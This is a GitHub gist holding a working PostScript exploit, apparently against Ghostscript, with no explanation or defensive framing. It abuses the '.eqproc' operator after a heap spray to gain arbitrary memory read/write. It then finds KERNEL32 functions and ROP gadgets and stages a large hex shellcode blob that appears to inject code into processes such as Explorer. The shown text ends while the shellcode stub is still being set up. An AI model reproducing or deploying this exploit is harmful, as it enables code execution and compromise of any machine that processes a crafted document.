Created
April 17, 2018 03:58
-
-
Save Jack2/c11ed5763562293c0066780845191d36 to your computer and use it in GitHub Desktop.
2C8F6FA1CBBF91676B361A2011B6F43D1F1E75B8208F40BE2C186FF0F586CA0B
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| /shellcode <8BE5E9FD0D0000558BEC8B4D04B8DDCCBBAAEB0141390175FB5DE900000000558BEC83E4F881EC7C01000053568BD9B9C838A44057E8820A0000B9F1FD98A189442444E8740A0000B9EE95B65089442434E8660A0000B95D4461FE8944242CE8580A0000B9AE87923F8BF0E84C0A0000B9C5D8BDE789442430E83E0A0000B958A453E589442424E8300A0000B9F0B5A25689442428E8220A0000B94713726F8944244CE8140A0000B913EF7A758BF8E8080A0000B90ACDF9238944241CE8FA090000B91EA77C2589442420E8EC090000B9C6121E7089442438E8DE090000894424148D8424800000006804010000506A00FFD68BF0B90B2F0F3089742410E8B90900008944244885F6741E8D8C24800000008A5431FF80FA5C740A80FA2F740583EE0175ED897424108364245C008D8C248000000003CEC74424504558504C8D542450C74424544F524552C74424582E455845E80C03000085C00F843302000033C9E8400A00008944241885C00F841802000033C95151516A025150FF5424388944243C85C00F84FF01000033C95151516A0450FF5424308BF885FF0F84E9010000B8657865638BF73907740546390675FB6A00FF74241C83C605FF54241C6A048BCF2BCE03C16800300000506A0089442420FF5424388BC8894C242085C90F84A60100008364242800837C24100076208BD12BF18B4C24288B041683C10433430489028D52043B4C241072EC8B4C2420E8E60100008BF05789742420FF54243CFF74243CFF542438E88101000085C074248B430C8D7B18037B108BCE89442468E8930100008D0C06E8AE0100008BF08974241CEB0B8B43088BFB2BF8894424688BCEE8710100008D4C245089442418E8ED0200008BF085F60F840C010000E827020000566A0068FFFF1F00FF5424388B4C24688BF06A40680030000083C118516A0056FF5424446A046800300000FF742420894424206A0056FF5424448BC8C7442460DDCCBBAA8B442414894C242C894C247485C00F84AF00000085C90F84A70000008D4C241051FF74246C575056FF54243885C00F848F0000008D442410506A188D442468508B442474034424205056FF54243885C074718D44241050FF74241CFF742424FF74243856FF54243885C07457E87600000085C0741F2B7B108D442440508D4424145033C05050FF742424505056FFD783C420EB1B8D442478508D4424445033C050FF742420505050505056FF54246C56FF54243868008000006A00FF742428FF5424546A00FF542450EB138B4B14E8610000008BC8E88E0000006A00FFD75F5E33C05B8BE55DC3558BEC515633F6B9604776108975FCE8F906000085C0740B8D4DFC516AFFFFD08B75FC8BC65E8BE55DC38BC185C07501C38B483C03C80FB751140FB7410603D1486BC8288B44112C03441128C3565733D2BF4D5A0000663939750F0FB7413CBE5045000066393408740A414281FA000400007CE233C06639395F0F45C88BC15EC3558BEC83EC2453568BD18D4DDC578955FCE890050000E87C050000E843050000608D4DDCE852030000618B45FC5F5E5B8BE55DC35356578BFA8BF1EB1E8A0784C0741E0FBEC8E8750500000FBECB8BD0E86B0500003BC2750846478A1E84DB75DC0FBE0EE8570500000FBE0F8BD0E84D0500005F2BD05E8BC25BC3558BEC83EC68B9E4E3948A535657E8FE050000B94D7EC91D8BF0E8F2050000B9F1FD98A18BF8E8E6050000B952F3E2518BD8E8DA0500008D4DFC516A20FFD050FFD685C0746A33D2C74598080000008BCA8D45A4C70002000000418950FC8D400C3B4D9872EE5252528D4598C7459C140000005052FF75FCC745A80E000000C745B421000000C745C00A000000C745CC0D000000C745D812000000C745E413000000C745F009000000FFD7FF75FCFFD35F5E5B8BE55DC3558BEC81EC340100005356894DFC33F657B9F1FD98A1E83F050000566A02B980391E928BD8E830050000FFD08BF883FFFF750433C0EB48C785D0FEFFFF28010000B927A9E867EB178B4DFC8D95F4FEFFFFE8ACFEFFFF85C0741AB98D5201BD8D85D0FEFFFF5057E8EE040000FFD085C075D6EB068BB5D8FEFFFF57FFD38BC65F5E5B8BE55DC3558BEC568B750885F6740D2BD18A040A88014183EE0175F533C0405E5DC3558BEC83EC148B413C56578955F08BB408A000000003F1894DEC8975FC8D7E048B07897DF885C0747C538B168D58F803D18D4608D1EB8945F474588B75F08BF80FB70F4B8BC1C1E80C83E801742683E801741583E801740583E807752681E1FF0F0000013411EB1B81E1FF0F000066013411EB0F81E1FF0F00008BC6C1E8106601041183C70285DB75B68B75FC8B7DF88B4DEC03378975FC8D7E048B07897DF885C075865B33C05F405E8BE55DC3558BEC83EC1056578BF933D28BCA894DFC8B473C8BB4388000000003F78975F00F84C90000008B460C5333DB4385C00F84B300000085C90F85AF0000008D0C38E8030300008BD08955F485D20F848D0000008B5E108B0603DF85C075078BC3895DF8EB0503C78945F88B0885C974558B75FC791E8B423C0FB7C98B4410782B4C10108B44101C8D04888B041003C28903EB1A8D570203D18B4DF4E8B70200008B55F485C06A018903580F44F08B45F883C30483C0048945F88B0885C975B48975FC8B75F08B462083C6148B4DFC8975F085C00F855DFFFFFF33DB8BC143EB0533DB438BC385C075048BD3EB0233D25B5F8BC25E8BE55DC38B511C8B49086A006A01528B492803CAFFD133C040C38B41088B491C568B70343BCE750533C0405EC383B8A400000000750433C05EC38BD12BD65EE91BFEFFFF558BEC83EC3453568BF133DB85F6750733C0E95D01000057B9D1AD21BDE8AF020000B9203504D88945F4E8A2020000B952F3E2518945F8E895020000B958A453E58945F0E888020000B910E18AC38945FCE87B0200008B7E148945EC8D45CC6A1C5057FF55F885C0741E8B5DF8817DDC000001007410037DD88D45CC6A1C5057FFD385C075E733DB8B46088B4E143948347233397834732E8B7DF485FF742751FF55F050FFD78B7DFC85C0751C8B4E086A0468003000008B41504050FF7134FFD789461CEB038B7DFC8B4E086A0468003000008B41504050FF7134FFD789461C85C075228B46083998A400000075058B4034EB0F8B40506A046800300000405053FFD789461C8B4E1C85C974648B46088B5610FF7054E8E2FCFFFF8B460833D2590FB74814663B500673438D782803F98B57048B4E1CFF37035610034FFCE8BAFCFFFFF74714000000205974128D45E8508B461C0347FC6A40FF3750FF55EC8B46084383C7280FB740063BD872C233DB438BC35F5E5B8BE55DC35633F685C974238B51108951048B423C03C2894108813850450000750D64A130000000468B40088941148BC65EC3568BF1E8CAFFFFFF85C0750433C05EC3E843FEFFFF85C074F38B4E1CE800FDFFFF85C074E78BCEE802FEFFFFF7D85E1BC0F7D8C333C085C9740889511040C6410C01C333C088410C894118894104894108890189411089411489411CC38D41E083F95A0F4FC88BC1C351B94C772607E8B5000000FFD0C3558BEC83EC1056578BFA8BF15756B949F70278897DF4E897000000FFD085C075768B463C538B44307885C0746703C68945F88B48248B502003CE894DF003D68B481885C9744E8D59FF8D1C9A8B1303D68A023A078845FF8B45F87524807DFF00741A8A42013A47018845FF8B45F8751083C20283C702807DFF0075D433D2EB051BD283CA0185D274148B7DF483EB0483E90175B833C05B5F5E8BE55DC38B55F08B401C0FB74C4AFE8D04888B043003C6EBE4558BEC83EC1C64A1300000005356894DE88B400C578B50148BC28955F48955FC8B4A2885C90F84950000008B72108B463C8B5C307885DB0F84800000000FB7422433FF8945F88BF08A01C1CF0D3C610FB6C0720383E82003F8418BC64E85C079E78B721003DE897DF08B43208B4B2403C68B7B1803CE894DE485FF74408D04B883C0FC8945F88B1003D633F68A0AC1CE0D0FB6C103F04284C975F18B55F48B45F08975EC0345EC8B72103B45E874278B45F883E8048945F883EF0175C98B45FC8B128955F43BD00F8553FFFFFF33C05F5E5B8BE55DC38B45E40FB74C78FE8B431C8D04888B043003C6EBE4558BEC83EC4C5356894DECB95D3E519557E8FFFEFFFFB932C2C7FA8945FCE8F2FEFFFFB9BE0E22E78945C4E8E5FEFFFFB94947C6628945E8E8D8FEFFFFB952F3E2518945C8E8CBFEFFFFB91808CC678945E0E8BEFEFFFFB9AB82BFA48945DCE8B1FEFFFFB9515724F88945D8E8A4FEFFFFB9F1FD98A18BF0E898FEFFFFB91F1E5AD48945F8E88BFEFFFF8945F4FFD68BD833F68B45ECBF000001008975F085C0750BFF55C88945ECFF55E0EB0A50566A40FF1534A036015756538945E4FF55DC6A00578BF08945C8566A10FF55FC3D040000C0751F03FF57566A0053FF55D86A00578BF0566A10FF55FC3D040000C074E48975C885C0790733C0E9570100008365D000833E000F863A0100008D7E04897DCC837DF0000F852A0100008365FC008BF78D7DB4A5A5A5A50FB745B43B45EC0F85F50000000FB775BA8D45FC6A006A006A0050FF55E05056FF75E4FF55C485C00F88D40000008B75DC68001000006A0053FFD66A0068001000008BF8576A02FF75FCFF55E885C00F88A7000000817DC09F011200750C576A0053FF55F4E99200000068001000006A0053FFD68BF08D45D4506800100000566A01FF75FCFF55E885C0791EFF75D4566A0053FF55D86A00FF75D48BF0566A01FF75FCFF55E885C078438B0E8B46046685C974390FB7D1D1EA66837C50FA2E752C0FB74C50FCE855FCFFFF83F850751D8B46040FB74C50FEE843FCFFFF8B4DF083F8530FB745BA0F44C8894DF0578B7DF46A0053FFD7566A0053FFD7FF75FCFF55F88B45D08B75C8408B7DCC83C7108945D0897DCC3B060F82CCFEFFFF566A0053FF55F4FF75E4FF55F88B45F05F5E5B8BE55DC351E8FDF1FFFFB9515724F8E8A8FCFFFFFFD059C3DDCCBBAA384E8B45160E000054100000100100000000000053565755E86C00000085C0745D4889E64883E4F04883EC68B8FA80395EE8780000004889C34D31C04831C0488944245048894424484889442440488944243848894424308B462448894424288B46204889442420448B4E14BA000000108B4E30FFD34889F4E8180000005D5F5E5BC331C048F7D8C3E8F5FFFFFF7405586A3350CBC3E8E8FFFFFF75105883EC08890424C744240423000000CBC3565753514989C06A605E65488B06488B40184C8B5030498B6A104885ED89E8744F4D8B128B453C83C0108B440578488D740518AD9167E3DEAD4C8D5C0500AD488D7C0500AD488D5C05008B748FFC4801EE31C099AC01C2C1C205FFC879F64439C2E0E775B10FB7144B418B04934801E8595B5F5EC300E933100000CCCCCC488B0C24B8DDCCBBAAEB0348FFC1390175F9E901000000CC48895C24085556574154415541564157488DAC2420FFFFFF4881ECE0010000488BF9B9C838A440E8E80B0000B9F1FD98A148894598E8DA0B0000B9EE95B65048898538010000E8C90B0000B95D4461FE48894590E8BB0B0000B9AE87923F488BD8E8AE0B0000B9C5D8BDE748898530010000E89D0B0000B958A453E54C8BE8E8900B0000B9F0B5A25648894580E8820B0000B94713726F488945A8E8740B0000B913EF7A75488BF0E8670B0000B90ACDF9234C8BE0E85A0B0000B91EA77C254C8BF8E84D0B0000B9C6121E7048894588E83F0B000041B8040100004889442478488D55D033C9FFD38BD8B90B2F0F3048899D28010000E8190B0000488945A04885DB741F488D4DD0807C19FF5C740D807C19FF2F74064883EB0175EC48899D280100008364245C00488D4DD04803CBC74424504558504C488D542450C74424544F524552C74424582E455845E8F702000033DB85C00F843902000033C9E8A60B00004C8BF04885C00F843A02000048895C2428448D43024533C9895C242033D2488BC841FFD74C8BF84885C00F84160200004533C948895C24204533C08D5304488BC841FFD4488BF04885C00F84F6010000488BD8B8657865633903740748FFC3390375F933D2498BCEFF5424788BD033C98D430541B8003000002BC64898482BD0448D490448899528010000FF55804C8BE04885C00F84AC01000033D248399528010000761B33C98B44190583C204334704428904218BCA483B8D2801000072E7488BCEFF5588498BCFFF95380100008B4708482BF889442468E888010000488D4C2450448BF0E84B0300008BD885C00F8451010000E844020000448BC333D2B9FFFF1F00FF5590448B44246833D24983C018C74424204000000041B900300000488BC8488BD8FF953001000041B900300000C744242004000000458BC633D2488BCB488BF0458BFEFF9530010000C7442460DDCCBBAA4C8BF0894424744885F60F84E00000004885C00F84D7000000448B4C2468488D85280100004C8D47184889442420488BD6488BCB41FFD533FF85C00F84AF0000008B542468488D85280100004803D64889442420448D4F18488BCB4C8D44246041FFD585C00F8485000000488D8528010000458BCF4533C04889442420498BD6488BCB41FFD585C07466488D45B84533C948894424484533C0488D45B033D24889442440488BCB48897C2438488974243048897C242848897C2420FF5598488BCBFF953801000033D241B800800000498BCCFF55A033C9FF55A8EB148B4F14E830000000488BC8E86400000033C9FFD633C0488B9C24200200004881C4E0010000415F415E415D415C5F5E5DC3CCCCCC33C0C3CC4533D241B94D5A0000418BD26644390975110FB7413C41B8504500006644390408740D48FFC1FFC281FA000400007CDC66443909490F45CA488BC1C340534883EC60488BD9488D4C2420E8F1060000488BD3488D4C2420E8CC060000488D4C2420E872060000488D4C2420E8FC030000488BC34883C4605BC3CCCCCC4883EC28448A114C8BCA4C8BC1EB27418039007426410FBE09E8CA060000410FBECA8BD0E8BF0600003BC2750E49FFC049FFC1458A104584D275D4410FBE08E8A4060000410FBE098BD0E8990600002BD08BC24883C428C3488BC448895810488970184889782055488D68A14881ECA0000000B9E4E3948AE84F070000B94D7EC91D488BD8E842070000B9F1FD98A1488BF8E835070000B952F3E251488BF0E828070000FFD0488BC84C8D4567BA20000000FFD34533C085C0747BC745E708000000418BD08BC2FFC2488D0C40C7448DF3020000004489448DEF3B55E772E6488B4D674533C94C8944242833D24C894424204C8D45E7C745EB14000000C745F70E000000C7450321000000C7450F0A000000C7451B0D000000C7452712000000C7453313000000C7453F09000000FFD7488B4D67FFD64C8D9C24A0000000498B5B18498B7320498B7B28498BE35DC3CC48895C240848896C24104889742418574881EC50010000488BE933DBB9F1FD98A1E856060000B980391E92488BF0E84906000033D28D4B02FFD0488BF84883F8FF750433C0EB43C744242030010000B927A9E867E823060000488D542420488BCFFFD085C0741C488D54244C488BCDE83CFEFFFF85C07407B98D5201BDEBD58B5C2428488BCFFFD68BC34C8D9C2450010000498B5B10498B6B18498B7320498BE35FC3CC4C8BCA4585C074154C2BC9458BC0418A1409881148FFC14983E80175F1B801000000C3CC48895C2408488974241048897C24184863413C488BDA4C8BD9448B8408B00000004C03C1418B400485C0747DBEFF0F0000458B08498D7808448BD04D03CB4983EA0849D1EAEB4E0FB70F41FFCA8BD1C1EA0C83EA01742B83EA01741C83EA01740E83FA07752B4823CE4A011C09EB224823CE42011C09EB194823CE6642011C09EB0F4823CE488BC348C1E81066420104094883C7024585D275AD418B40044C03C0418B400485C07588488B5C2408B801000000488B742410488B7C2418C3CCCC48895C240848896C241048897424185741544155415641574883EC204863413C33DB488BE9448BFB8BBC08900000004803F90F84C10000008B470C448D6B0185C00F84AF0000004585FF0F85A90000008BC84803CDE8C20300004C8BE04885C00F8488000000448B77104C03F5391F7505498BF6EB5F8B374803F5EB5848B800000000000000804885D07428496344243C0FB7D2428B8C2088000000428B442110428B4C211C482BD04903CC8B04914903C4EB164883C202498BCC4803D5E8790300004885C0450F44FD4883C6084989064983C608488B164885D275A08B47204883C71485C00F855BFFFFFFEB03458BFD4585FF7503418BDD488B6C24588BC3488B5C2450488B7424604883C420415F415E415D415C5FC34883EC28488B41104533C0448B4828418D50014C034938488B493841FFD1B8010000004883C428C3488B4110488B49384C8B4030493BC87506B801000000C383B8B400000000750333C0C3488BD1492BD0E9D2FDFFFFCCCC48895C241048896C241848897424205741544155415641574883EC5033FF488BD94885C9750733C0E986010000B9D1AD21BDE84D030000B9203504D84C8BF8E840030000B952F3E251488BE8E833030000B958A453E54C8BE0E826030000B910E18AC34C8BF0E819030000488B73284C8BE8EB0F817C244000000100741A480374243841B830000000488D542420488BCEFFD54885C075DC488B4310488B6B284839683072394839703073334D85FF742E41FFD4488BC8488BD541FFD785C0751E488B4B10448D480441B8003000008B5150488B4930FFC241FFD648894338488B4B1041B90400000041B8003000008B5150488B4930FFC241FFD6488943384885C0752A488B431039B8B40000007506488B4030EB148B505033C9FFC241B800300000448D490441FFD648894338488B4B384885C9747A488B4310488B5320448B4054E864FCFFFF4C8B5310410FB7421466413B7A067354498D72284803F08B56048B4EFC4803532048034B38448B06E837FCFFFFF7461400000020741A8B4EFC4C8D8C248000000048034B3841B8400000008B1641FFD5488B431048FFC74883C6280FB74806483BF972B3BF010000008BC74C8D5C2450498B5B38498B6B40498B7348498BE3415F415E415D415C5FC3CCCCCC4C8BC133C94D85C07431498B5020498950084863423C4803D049895010813A50450000751665488B042560000000488B481049894828B9010000008BC1C3CCCC48895C2408574883EC20488BF9E8AEFFFFFF33DB85C0750433C0EB28488BCFE8C8FDFFFF85C074F0488B4F38E84BFCFFFF85C074E3488BCFE87FFDFFFF85C00F95C38BC3488B5C24304883C4205FC3CC4885C9750333C0C348895120B801000000C6411801C3CCCC33C0884118488941304889410848894110488901488941204889412848894138C3CCCCCC8D41E083F95A0F4FC88BC1C340534883EC20488BD9B94C772607E8C5000000488BCB4883C4205B48FFE0CCCC48895C240848896C24104889742418574883EC20488BD9488BEAB949F70278E894000000488BD5488BCBFFD04885C0755B4863433C448B8418880000004D85C074484C03C3458B5020458B48244C03D3418B48184C03CB85C9742F8D71FF488BFD418B14B24803D3482BFA0FB602440FB61C3A412BC3750848FFC24585DB75EB85C0741D8BCE85F675D133C0488B5C2430488B6C2438488B7424404883C4205FC38D41FF418B481C410FB714414803CB8B04914803C3EBD4488BC4488958084889681048897018488978204156415765488B042560000000448BF9488B50184C8B42204D8BF0498B50504885D2747E4D8B48204963413C468B9408880000004D85D27469450FB7584833C90FB602C1C90D803A61720383E82003C848FFC2418BC341FFCB85C079E34D03D1418B7220418B5A244903F1418B52184903D985D2742C8D6AFF8B3CAE4903F94533DB0FB60748FFC741C1CB0D4403D884C075EF418D040B413BC7742D8BD585ED75D44D8B004D3BC60F856DFFFFFF33C0488B5C2418488B6C2420488B742428488B7C2430415F415EC3418B4A1C8D42FF0FB714434903C98B04914903C1EBD1CCCC40555356574154415541564157488D6C24E14881ECA8000000894D67B95D3E5195E8E6FEFFFFB932C2C7FA4C8BF0E8D9FEFFFFB9BE0E22E7488945DFE8CBFEFFFFB94947C662488945B7E8BDFEFFFFB952F3E251488BF8E8B0FEFFFFB91808CC67488945C7E8A2FEFFFFB9AB82BFA4488945CFE894FEFFFFB9515724F8488945D7E886FEFFFFB9F1FD98A1488BD8E879FEFFFFB91F1E5AD44C8BE8E86CFEFFFF4C8BF8FFD333C9488BD88B4567BE0000010048894D7F448BE185C0750AFFD7894567FF55C7EB0E33D2448BC08D4A40FF15DB9C01004C8BC6488945BF33D2488BCBFF55CF4533C9448BC6488BD0488BF8418D491041FFD63D040000C075354C8B65D78D0C364C8BC78BF133D2448BC9488BCB41FFD44533C9448BC6488BD0488BF8418D491041FFD63D040000C074D34C8B657F33D285C0790733C0E9BA010000448BF239170F869A0100004D85E40F8591010000418BC648895577488D0C400F1044CF08F20F104CCF18660F7EC00F1145E70FB7C0F20F114DF73B45670F85560100000FB775EDFF55C7488B4DBF4C8D4D774C8BC08BD633C0894424308944242889442420FF55DF33D285C00F8827010000488B75CF41B800100000488BCBFFD6488B4D774C8BE033C041B9001000004D8BC448894424208D5002FF55B785C00F88E600000033D2488BCB817DF79F01120075084D8BC4E9CD00000041B800100000FFD6488B4D77488BF0488D456F4C8BC641B9001000004889442420BA01000000FF55B785C0792E448B4D6F4C8BC633D2488BCBFF55D7448B4D6F488BF0488B4D7733C04C8BC648894424208D5001FF55B785C0785F0F1006660F7EC00F1145FF6685C0744F4C8B45070FB7D0D1EA8D42FD4863C86641833C482E75388D42FE4863C8410FB70C48E89AFBFFFF83F85075238D42FF4863C8410FB70C48E885FBFFFF488B4D7F83F8530FB745ED480F44C848894D7F4D8BC433D2488BCB41FFD7488BCB33D24C8BC641FFD7488B4D7741FFD54C8B657F33D241FFC6443B370F8266FEFFFF4C8BC733D2488BCB41FFD7488B4DBF41FFD5498BC44881C4A8000000415F415E415D415C5F5E5B5DC3CCCC4883EC28E8C7EFFFFFB9515724F8E8E9FBFFFF4883C42848FFE0CCCC> def | |
| /leaked_count 16#FFFF def | |
| /leaked_array leaked_count array def | |
| /control_str (poor) def | |
| /leak_obj 1 array def | |
| /arch 0 def | |
| /str_count 16#100 def | |
| /buffers str_count array def | |
| /step_size 16#8 def | |
| /init_size 16#18F0 def | |
| /first_array 16#31E array def | |
| /second_array 16#215 array def | |
| /final_array 16#1 array def | |
| /spray { | |
| first_array aload | |
| 16#10 { second_array aload } repeat | |
| 16#100 { /sp_str 16#152F string def} repeat | |
| 0 1 str_count 1 sub { | |
| /control_string 16#152F string def | |
| 0 1 control_string length 1 sub { | |
| control_string exch 1 put | |
| } for | |
| buffers exch control_string put | |
| } for | |
| } bind def | |
| /read32 { | |
| /addr32 exch def | |
| /idxmem addr32 -15 bitshift def | |
| /off addr32 16#7FFF and def | |
| /cur_buf leaked_array idxmem get def | |
| cur_buf off get | |
| cur_buf off 1 add get 8 bitshift or | |
| cur_buf off 2 add get 16 bitshift or | |
| cur_buf off 3 add get 24 bitshift or | |
| } bind def | |
| /write32 { | |
| /val exch def | |
| /addr32 exch def | |
| /idxmem addr32 -15 bitshift def | |
| /off addr32 16#7FFF and def | |
| /cur_buf leaked_array idxmem get def | |
| cur_buf off val 16#FF and put | |
| cur_buf off 1 add val -8 bitshift 16#FF and put | |
| cur_buf off 2 add val -16 bitshift 16#FF and put | |
| cur_buf off 3 add val -24 bitshift 16#FF and put | |
| } bind def | |
| /read16 { | |
| /addr16 exch def | |
| /idxmem addr16 -15 bitshift def | |
| /off addr16 16#7FFF and def | |
| /cur_buf leaked_array idxmem get def | |
| cur_buf off get | |
| cur_buf off 1 add get 8 bitshift or | |
| } bind def | |
| /write16 { | |
| /val exch def | |
| /addr16 exch def | |
| /idxmem addr16 -15 bitshift def | |
| /off addr16 16#7FFF and def | |
| /cur_buf leaked_array idxmem get def | |
| cur_buf off val 16#FF and put | |
| cur_buf off 1 add val -8 bitshift 16#FF and put | |
| } bind def | |
| /read8 { | |
| /addr8 exch def | |
| /idxmem addr8 -15 bitshift def | |
| /off addr8 16#7FFF and def | |
| /cur_buf leaked_array idxmem get def | |
| cur_buf off get | |
| } bind def | |
| /write8 { | |
| /val exch def | |
| /addr8 exch def | |
| /idxmem addr8 -15 bitshift def | |
| /off addr8 16#7FFF and def | |
| /cur_buf leaked_array idxmem get def | |
| cur_buf off val 16#FF and put | |
| } bind def | |
| /buf_str 16#100 string def | |
| /readstr { | |
| /read_count exch def | |
| /addrstr exch def | |
| /idxstr 0 def | |
| 0 1 buf_str length 1 sub { | |
| buf_str exch 0 put | |
| } for | |
| read_count { | |
| buf_str idxstr addrstr idxstr add read8 put | |
| /idxstr idxstr 1 add def | |
| } repeat | |
| buf_str | |
| } bind def | |
| /writestr { | |
| /arg exch def | |
| /addrstr exch def | |
| /write_count arg length def | |
| 0 1 write_count 1 sub { | |
| /idxstr exch def | |
| addrstr idxstr add arg idxstr get write8 | |
| } for | |
| } bind def | |
| /strlwr { | |
| /val exch def | |
| /len val length def | |
| /ret len string def | |
| 0 1 len 1 sub { | |
| /idxlwr exch def | |
| /ch val idxlwr get def | |
| ch 16#5A gt { | |
| /ch ch 16#20 sub def | |
| } if | |
| ret idxlwr ch put | |
| } for | |
| ret | |
| } bind def | |
| /strupr { | |
| /val exch def | |
| /len val length def | |
| /ret len string def | |
| 0 1 len 1 sub { | |
| /idxupr exch def | |
| /ch val idxupr get def | |
| ch 16#61 lt { | |
| /ch ch 16#20 add def | |
| } if | |
| ret idxupr ch put | |
| } for | |
| ret | |
| } bind def | |
| /FindPE { | |
| 16#7FFF0000 and | |
| /ba exch def | |
| { | |
| ba read16 16#5A4D eq { | |
| /e_lfanew ba 16#3C add read32 def | |
| e_lfanew 16#200 lt { | |
| ba e_lfanew add read16 16#4550 eq { | |
| exit | |
| } if | |
| } if | |
| } if | |
| /ba ba 16#10000 sub def | |
| } loop | |
| ba | |
| } bind def | |
| /GetImportDirectoryAddress { | |
| /dll_name exch def | |
| /base exch def | |
| /NtHeader base dup 16#3C add read32 add def | |
| /arch NtHeader 16#19 add read8 def | |
| arch 01 eq { | |
| /import_addr base NtHeader 128 add read32 add def | |
| /import_size NtHeader 132 add read32 def | |
| } | |
| { | |
| arch 02 eq { | |
| /import_addr base NtHeader 144 add read32 add def | |
| /import_size NtHeader 148 add read32 def | |
| } if | |
| } ifelse | |
| 0 0 20 import_size 1 sub { | |
| /i exch def | |
| /imp_name import_addr i add 12 add read32 def | |
| imp_name 0 eq { quit } if | |
| base imp_name add 14 readstr strlwr dll_name strlwr search { | |
| length 0 eq { | |
| pop pop pop import_addr i add | |
| exit | |
| } if | |
| pop | |
| } if | |
| pop | |
| } for | |
| } bind def | |
| /GetImportModule { | |
| /imported_dll_name exch def | |
| /org_dll exch def | |
| /imp_dir_addr org_dll imported_dll_name GetImportDirectoryAddress def | |
| /imp_func_tbl imp_dir_addr read32 org_dll add def | |
| /imp_count imp_func_tbl read32 def | |
| imp_count 0 ne { | |
| imp_dir_addr 16 add read32 org_dll add read32 FindPE | |
| } | |
| { | |
| 0 | |
| }ifelse | |
| } bind def | |
| /GetProcAddress { | |
| /fname exch def | |
| /ba exch def | |
| /pfAddr 0 def | |
| /len fname length def | |
| /NtHeader ba dup 16#3C add read32 add def | |
| /ExportDir ba NtHeader 16#78 add read32 add def | |
| /NumberOfNames ExportDir 16#18 add read32 def | |
| /AddressOfFunctions ba ExportDir 16#1C add read32 add def | |
| /AddressOfNames ba ExportDir 16#20 add read32 add def | |
| /AddressOfNameOrdinals ba ExportDir 16#24 add read32 add def | |
| 0 1 NumberOfNames 1 sub { | |
| /idx exch def | |
| /FNameAddr ba AddressOfNames idx 2 bitshift add read32 add def | |
| FNameAddr len readstr fname search { | |
| pop pop pop | |
| /NameOrdinal AddressOfNameOrdinals idx 1 bitshift add read16 def | |
| /pfAddr ba AddressOfFunctions NameOrdinal 2 bitshift add read32 add def | |
| exit | |
| } if | |
| pop | |
| } for | |
| pfAddr | |
| } bind def | |
| /strncmp { | |
| /len exch def | |
| /str2 exch def | |
| /str1 exch def | |
| /len1 str1 length def | |
| /len2 str2 length def | |
| len1 len lt {/len len1 def} if | |
| len2 len lt {/len len2 def} if | |
| /ret 0 def | |
| 0 1 len 1 sub { | |
| /idx exch def | |
| /ret str1 idx get str2 idx get sub def | |
| ret 0 ne {exit} if | |
| } for | |
| ret | |
| } bind def | |
| /search_str { | |
| /pat exch def | |
| /addrsearch exch def | |
| /patlen pat length def | |
| { | |
| addrsearch patlen readstr pat patlen strncmp 0 eq { | |
| exit | |
| } if | |
| /addrsearch addrsearch 1 add def | |
| } loop | |
| addrsearch | |
| } bind def | |
| spray | |
| second_array aload | |
| final_array aload | |
| /overwrite_fail true def | |
| /eq_count 0 def | |
| { | |
| .eqproc | |
| /zero_flag true def | |
| /idx 0 def | |
| str_count { | |
| /zero_flag true def | |
| /control_str buffers idx get def | |
| /overwrite_pos control_str length 16#20 sub def | |
| control_str overwrite_pos get | |
| { | |
| zero_flag { | |
| /zero_flag false def | |
| } | |
| { | |
| /zero_flag true def | |
| exit | |
| } ifelse | |
| } repeat | |
| zero_flag { | |
| /overwrite_fail false def | |
| exit | |
| } if | |
| /idx idx 1 add def | |
| } repeat | |
| zero_flag { | |
| /overwrite_fail false def | |
| exit | |
| } if | |
| /eq_count eq_count 1 add def | |
| } loop | |
| overwrite_fail { | |
| quit | |
| } | |
| { | |
| } ifelse | |
| 8 { | |
| /zero_flag true def | |
| control_str overwrite_pos get | |
| { | |
| zero_flag { | |
| /zero_flag false def | |
| } | |
| { | |
| /zero_flag true def | |
| exit | |
| } ifelse | |
| } repeat | |
| zero_flag { | |
| /overwrite_pos overwrite_pos 1 sub def | |
| } | |
| { | |
| /overwrite_pos overwrite_pos 1 add def | |
| exit | |
| } ifelse | |
| } repeat | |
| leaked_array 0 leaked_array | |
| control_str overwrite_pos 16#18 add 16#7E put | |
| control_str overwrite_pos 16#19 add 16#12 put | |
| control_str overwrite_pos 16#1A add 16#00 put | |
| control_str overwrite_pos 16#1B add 16#80 put | |
| put | |
| 16#10 { second_array aload } repeat | |
| /base_addr_str leaked_array 0 get 4 4 getinterval def | |
| /base_addr base_addr_str 0 get base_addr_str 1 get 8 bitshift or base_addr_str 2 get 16 bitshift or base_addr_str 3 get 24 bitshift or def | |
| 0 1 15 { | |
| /i exch def | |
| /val i 15 bitshift base_addr add def | |
| /off i 16#FFF and 3 bitshift def | |
| /idx i -12 bitshift def | |
| /cur_buf leaked_array idx get def | |
| cur_buf off 16#7E put | |
| cur_buf off 1 add 16#12 put | |
| cur_buf off 2 add 16#00 put | |
| cur_buf off 3 add 16#80 put | |
| cur_buf off 4 add val 16#FF and put | |
| cur_buf off 5 add val -8 bitshift 16#FF and put | |
| cur_buf off 6 add val -16 bitshift 16#FF and put | |
| cur_buf off 7 add val -24 bitshift 16#FF and put | |
| } for | |
| 16 1 leaked_count 1 sub { | |
| /i exch def | |
| /val i 15 bitshift def | |
| /off i 16#FFF and 3 bitshift def | |
| /idx i -12 bitshift def | |
| /cur_buf leaked_array idx get def | |
| cur_buf off 16#7E put | |
| cur_buf off 1 add 16#12 put | |
| cur_buf off 2 add 16#00 put | |
| cur_buf off 3 add 16#80 put | |
| cur_buf off 4 add val 16#FF and put | |
| cur_buf off 5 add val -8 bitshift 16#FF and put | |
| cur_buf off 6 add val -16 bitshift 16#FF and put | |
| cur_buf off 7 add val -24 bitshift 16#FF and put | |
| } for | |
| leaked_array 1 {lt} put | |
| /pf_execfile base_addr 12 add read32 4 add read32 4 add read32 4 add read32 def | |
| /hGSDLL32 pf_execfile FindPE def | |
| /hKernel32 hGSDLL32 (KERNEL32.DLL) GetImportModule def | |
| /pfVirtualProtect hKernel32 (VirtualProtect) GetProcAddress def | |
| /pfExitProcess hKernel32 (ExitProcess) GetProcAddress def | |
| /xchg_ret hGSDLL32 <94C3> search_str def | |
| /ret_addr xchg_ret 1 add def | |
| /ret_0C hGSDLL32 <C20C00> search_str def | |
| leaked_array 1 shellcode put | |
| /shell_addr base_addr 12 add read32 def | |
| leaked_array 1 16#100 string put | |
| /stub_addr base_addr 12 add read32 def | |
| /null_stub stub_addr def | |
| null_stub null_stub 4 add write32 | |
| null_stub 4 add 0 write32 | |
| /shell_stub stub_addr 16#30 add def | |
